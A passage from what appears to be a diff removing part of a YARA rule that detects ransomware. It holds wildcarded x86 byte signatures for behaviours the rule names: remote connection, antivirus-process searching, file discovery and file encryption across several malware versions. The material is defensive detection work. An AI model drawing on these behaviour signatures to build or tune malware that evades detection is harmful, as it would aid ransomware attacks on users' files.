-            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 57 FF D3 57 FF 15 ?? ?? ?? ??
-            FF 74 24 ?? 8D 34 47 FF 15 ?? ?? ?? ?? 50 56 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 57 FF 15 ?? ?? ?? ?? FF 74 24 ?? 8D 34 47
-            FF 15 ?? ?? ?? ?? 50 56 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33
-            C0 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? 66 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? 58 58 8D 44 24 ?? 50 57 FF
-            D3 8B 5C 24 ?? 8B 35 ?? ?? ?? ?? 53 FF D6 6A ?? C1 E0 ?? 83 C0 ?? 68 ?? ?? ?? ?? 50
-            6A ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B F8 53 89 7C 24 ?? FF D6 8D 04 C5 ?? ?? ?? ??
-            85 FF 74 ?? 3B 44 24 ?? 72 ?? 33 FF 53 FF D6 8B 0D ?? ?? ?? ?? 8B F0 89 74 24 ?? 85
-            C9 74 ?? 68 ?? ?? ?? ?? 6A ?? 51 FF 15 ?? ?? ?? ?? 8B 5C 24 ?? 6A ?? 68 ?? ?? ?? ??
-            53 FF 15 ?? ?? ?? ?? 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 74 ??
-            53 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B 5C 24 ?? 03 F6 8B D6 8B CB E8 ??
-            ?? ?? ?? 8B 4C 24 ?? 8D 04 CD ?? ?? ?? ?? 89 44 24 ?? 8D 44 24 ?? 50 57 68 ?? ?? ??
-            ?? 56 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 57 FF D3
-            6A ?? 68 ?? ?? ?? ?? 8D 70 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 57 89 44 24 ?? FF D3 8D 48
-            ?? 8B 44 24 ?? 85 C0 74 ?? 89 44 24 ?? 3B CE 72 ?? C7 44 24 ?? ?? ?? ?? ?? 57 33 F6
-            FF D3 85 C0 74 ?? 8B 4C 24 ?? 89 4C 24 ?? 8A 04 3E 3C ?? 74 ?? 3C ?? 74 ?? 88 01 41
-            89 4C 24 ?? 57 46 FF D3 8B 4C 24 ?? 3B F0 72 ?? 8B 74 24 ?? 56 FF D3 50 FF 74 24 ??
-            6A ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 7C 24 ?? 8D 54 24 ?? 6A ?? 57 8B
-            CE C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 1D ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 50 8B 44 24 ?? 50 FF D3 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF D3 68 ?? ??
-            ?? ?? 6A ?? FF 74 24 ?? FF D3 33 F6 EB ?? 8B 4C 24 ?? 85 C9 74 ?? 8B 45 ?? 89 08 8B
-            44 24 ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 FF D3 68 ?? ?? ?? ?? 6A ?? FF 74
-            24 ?? FF D3 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF D3 EB ?? 8B 7C 24 ?? 83 7C 24 ?? ??
-            75 ?? 68 ?? ?? ?? ?? 6A ?? 57 FF D3 BE ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 74 24 ??
-            FF D3 8D 4C 24 ?? E8 ?? ?? ?? ?? 5F 8B C6 5E 5B 8B E5 5D C3
-        }
-		$remote_connection_v2_1 = {
-            53 89 45 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 3C 45 ?? ??
-            ?? ?? 8D 47 ?? 50 6A ?? FF D6 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B D8 FF D6
-            89 45 ?? 85 DB 74 ?? 8D 47 ?? 3B F8 73 ?? 8B F3 EB ?? 33 F6 FF 75 ?? 56 FF 15 ?? ??
-            ?? ?? F3 0F 6F 05 ?? ?? ?? ?? 56 F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45
-            ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3
-            0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? FF 15 ??
-            ?? ?? ?? 8D 45 ?? 33 FF 50 FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 68 ?? ?? ?? ?? 83 EC ??
-            68 ?? ?? ?? ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 50 56 FF 75 ?? 8B 75 ?? 8D 4D ?? 56 E8
-            ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? BF ?? ?? ?? ?? 74 ?? 8B 4D ?? 8D 55 ?? C7 45 ??
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 85 C0 74 ?? 8B 4D ?? 89 01 EB ?? 33
-            FF 68 ?? ?? ?? ?? 6A ?? 56 8B 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF
-            D6 68 ?? ?? ?? ?? 6A ?? 53 FF D6 8B 45 ?? 85 C0 74 ?? 50 FF 15 ?? ?? ?? ?? 8B C7 5F
-            5E 5B 8B E5 5D C3
-        }
-		$search_antivirus_processes_v4_1_2 = {
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? 8B F8 53 6A ??
-            89 7D ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 89 1E 83 FF ?? 74 ?? 56 57 FF 15 ?? ??
-            ?? ?? 33 DB 8D 7E ?? 57 FF B4 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 76 ??
-            50 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? FF 75 ??
-            FF 15 ?? ?? ?? ?? 43 83 FB ?? 72 ?? 8B 7D ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 85
-            F6 74 ?? 68 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5
-            5D C3
-        }
-		$find_files_v4_1_2 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 33 FF 89 54 24 ?? 8B F1 89 7C 24 ?? 39
-            7D ?? 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 85 C0 75 ?? 85 DB 75 ?? 33 C0 E9
-            ?? ?? ?? ?? 33 DB 43 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 74 ?? 8D 54 24 ??
-            89 7C 24 ?? 8B CE E8 ?? ?? ?? ?? 89 44 24 ?? 39 7C 24 ?? 75 ?? 56 FF 15 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 56 FF 15 ??
-            ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 ?? 66 89 11 83 F8 ?? 75 ?? BF ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ??
-            8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? F6
-            44 24 ?? ?? 74 ?? 85 DB 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 68 ??
-            ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8B 54 24 ?? 8B CE E8 ?? ?? ?? ?? EB ?? 68 ?? ??
-            ?? ?? 56 FF 15 ?? ?? ?? ?? 57 EB ?? FF 74 24 ?? 8D 54 24 ?? 8B CE E8 ?? ?? ?? ?? 59
-            8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85
-            ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B C7 5F 5E
-            5B 8B E5 5D C3
-        }
-		$crypt_files_v4_1_2 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 89 4D ?? 33 DB 57 B9 ?? ?? ?? ?? 89 5D ?? 8B F2 E8
-            ?? ?? ?? ?? 8B F8 8D 55 ?? 56 57 8D 4D ?? 89 7D ?? E8 ?? ?? ?? ?? 59 59 85 C0 0F 84
-            ?? ?? ?? ?? 53 53 6A ?? 53 53 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE
-            ?? 0F 84 ?? ?? ?? ?? 6A ?? 58 88 5D ?? 48 75 ?? 51 51 8D 55 ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 89 45 ?? B9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 89 5D ?? 89
-            5D ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 89 5D ?? 53 8D
-            45 ?? 50 68 ?? ?? ?? ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D
-            ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 45 ?? 81 F9 ?? ?? ?? ?? 6A ?? 5A 0F 42 C2 01 8F ?? ??
-            ?? ?? 8B 55 ?? 8D 8D ?? ?? ?? ?? 11 9F ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 50 FF 75 ?? 89
-            45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 C9 F7 D8 41 99 51 53 52 50 56 FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 53 8D 45 ?? 50 FF 75 ?? FF 75 ?? 56 FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? 8B 7D ?? 6A ?? FF 15 ?? ?? ?? ?? 53 8D 45 ?? 50 FF 75 ?? 57 56 FF 15
-            ?? ?? ?? ?? 85 C0 74 ?? 8B 7D ?? 8B 4D ?? 85 C9 0F 84 ?? ?? ?? ?? 53 8D 45 ?? 50 68
-            ?? ?? ?? ?? 57 56 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B D8 E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ??
-            ?? ?? 56 FF 15 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 5F 5E 8B C3 5B 8B E5 5D C3 33 C0 8D
-            48 ?? 89 4D ?? EB
-        }
-		$remote_connection_v4_1_2 = {
-            55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 8B F1 57 83 7E ?? ?? 74 ?? FF 76 ?? FF D3
-            8B CE E8 ?? ?? ?? ?? 33 FF 57 57 6A ?? 57 57 FF 75 ?? FF 75 ?? FF 76 ?? FF 15 ?? ??
-            ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ??
-            83 C4 ?? B8 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C8 57 51 57 57 68
-            ?? ?? ?? ?? 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF
-            75 ?? FF 75 ?? FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 FF 47 EB ?? FF
-            15 ?? ?? ?? ?? 8B 45 ?? 50 FF D3 56 FF D3 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B
-            E5 5D C2
-        }
-		$url_parameters_setup_v4_1_2 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 FF 15 ?? ?? ?? ?? 33 FF 57 57 57 FF 15 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 57 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ??
-            ?? ?? ?? 83 EC ?? 33 DB 43 53 83 EC ?? 53 51 53 51 53 51 53 51 53 83 EC ?? 53 51 53
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 0C 45 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 74 ?? 50 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF
-            D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ??
-            ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 FF 35 ?? ?? ??
-            ?? 8B 35 ?? ?? ?? ?? FF D6 FF 35 ?? ?? ?? ?? 03 C0 A3 ?? ?? ?? ?? FF D6 03 C0 8B D0
-            E8 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 57 57 57 68 ?? ?? ?? ?? 57 57 FF 15 ?? ?? ?? ??
-            8B 35 ?? ?? ?? ?? 8B F8 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF D6 BB ?? ?? ?? ?? 53
-            FF D6 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 53 FF D6 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ??
-            FF D6 E8 ?? ?? ?? ?? 85 FF 74 ?? 6A ?? 57 FF 15 ?? ?? ?? ?? E8
-        }
-		$url_parameters_setup_v4 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 6A ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 50 FF
-            15 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 04 45 ?? ?? ?? ?? 50 6A ?? FF 15 ??
-            ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 75 ?? 50 FF 15 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF
-            35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ??
-            ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ??
-            ?? FF D6 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 03 C0 8B D0 E8 ?? ?? ?? ?? 6A ?? FF 15
-            ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF D6 68 ?? ?? ??
-            ?? FF D6 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF D6
-            68 ?? ?? ?? ?? FF D6 E8 ?? ?? ?? ?? E8
-        }
-		$search_antivirus_processes_v4 = {
-            55 8B EC 83 EC ?? 53 56 8B 35 ?? ?? ?? ?? 57 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
-            ?? FF D6 8B 5D ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 89 03 C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? FF D6 8B F8 89 7D ?? 85 FF 74 ?? 6A ?? 6A ?? C7 07 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 5F 5E
-            33 C0 5B 8B E5 5D C2 ?? ?? 33 C9 33 F6 57 50 89 4D ?? 89 4D ?? 89 4D ?? 89 75 ?? FF
-            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 49 ?? 85 F6 0F 85 ?? ?? ?? ?? 83 C7 ?? EB
-            ?? 8D 49 ?? 57 FF 74 B5 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 46 83 FE ?? 72 ?? 8B 75 ??
-            EB ?? 83 7D ?? ?? 57 FF 33 C7 45 ?? ?? ?? ?? ?? 75 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? FF 33 FF 15 ?? ?? ?? ?? EB ?? 8B 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 33 FF D6
-            FF 45 ?? 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B 75 ?? 8D 0C 41 B8 ?? ?? ?? ?? 81 F9 ?? ??
-            ?? ?? 89 4D ?? 0F 47 F0 89 75 ?? 8B 7D ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ??
-            FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 03 66 83 38 ?? 74
-            ?? 50 FF 15 ?? ?? ?? ?? 8B 0B 33 D2 66 89 54 41 ?? 8B 45 ?? 8B 4D ?? 89 08 8B 35 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 FF D6 FF 75 ?? FF 15 ?? ?? ?? ?? 8B 7D ?? 85 FF 75
-            ?? 68 ?? ?? ?? ?? 57 FF 33 FF D6 8B C7 5F 5E 5B 8B E5 5D C2
-        }
-		$find_files_v4 = {
-            C7 44 24 ?? ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 0F 84 ?? ?? ??
-            ?? 8D 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 89 44 24
-            ?? 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8D 04
-            46 89 44 24 ?? FF D7 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24
-            ?? 66 89 11 83 F8 ?? 75 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B
-            E5 5D C3 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF D7 F6
-            44 24 ?? ?? 74 ?? 83 7C 24 ?? ?? 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74
-            ?? 68 ?? ?? ?? ?? 56 FF D7 6A ?? 8B D3 8B CE E8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 56
-            FF D7 6A ?? 8B D3 8B CE E8 ?? ?? ?? ?? EB ?? 53 8D 54 24 ?? 8B CE E8 ?? ?? ?? ?? 83
-            C4 ?? 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0
-            0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E
-            33 C0 5B 8B E5 5D C3
-        }
-		$crypt_files_v4 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 6A ?? 68 ?? ?? ?? ?? 33 DB 89 4D ?? 68 ?? ?? ??
-            ?? 53 8B F2 89 5D ?? FF 15 ?? ?? ?? ?? 8B F8 8D 55 ?? 56 57 8D 4D ?? 89 7D ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B
-            8B E5 5D C3 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ??
-            8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 88 5D ?? 48 75 ?? 8B 45 ?? 89 85 ??
-            ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B
-            45 ?? 89 45 ?? 8B 45 ?? 6A ?? 89 45 ?? 8B 45 ?? 68 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 68
-            ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 5D ?? 89 5D ?? 8B 1D ?? ?? ?? ?? 6A ?? C7 05 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? FF D3 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
-            89 45 ?? FF D3 33 C9 8B D8 89 4D ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? FF 75 ?? 56 FF
-            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 3D
-            ?? ?? ?? ?? BA ?? ?? ?? ?? 0F 42 CA 01 87 ?? ?? ?? ?? 8B 55 ?? 83 97 ?? ?? ?? ?? ??
-            8B 7D ?? 89 4D ?? 8D 8D ?? ?? ?? ?? 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B C7 F7 D8 99 6A
-            ?? 6A ?? 52 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50
-            57 53 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57
-            53 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 8B 7D ?? 85 C9 0F 84 ?? ?? ?? ?? 6A ??
-            8D 45 ?? 50 68 ?? ?? ?? ?? 57 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? 89
-            45 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ??
-            ?? 8B 5D ?? 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 5F 5E 8B C3 5B 8B E5 5D C3
-        }
-		$crypt_files_v3 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? C7 45
-            ?? ?? ?? ?? ?? 50 6A ?? 8B D9 8B CA 6A ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D6 8B F8 C7 45 ?? ?? ?? ?? ?? 53 57 89 7D ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 57 FF 15 ?? ??
-            ?? ?? 66 0F 6F 05 ?? ?? ?? ?? BA ?? ?? ?? ?? F3 0F 7F 85 ?? ?? ?? ?? 51 66 0F 6F 05
-            ?? ?? ?? ?? 8D 4D ?? F3 0F 7F 45 ?? C6 45 ?? ?? 66 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45
-            ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D6 F3 0F 6F 85 ?? ?? ?? ?? 8B F8 6A ?? 68 ?? ??
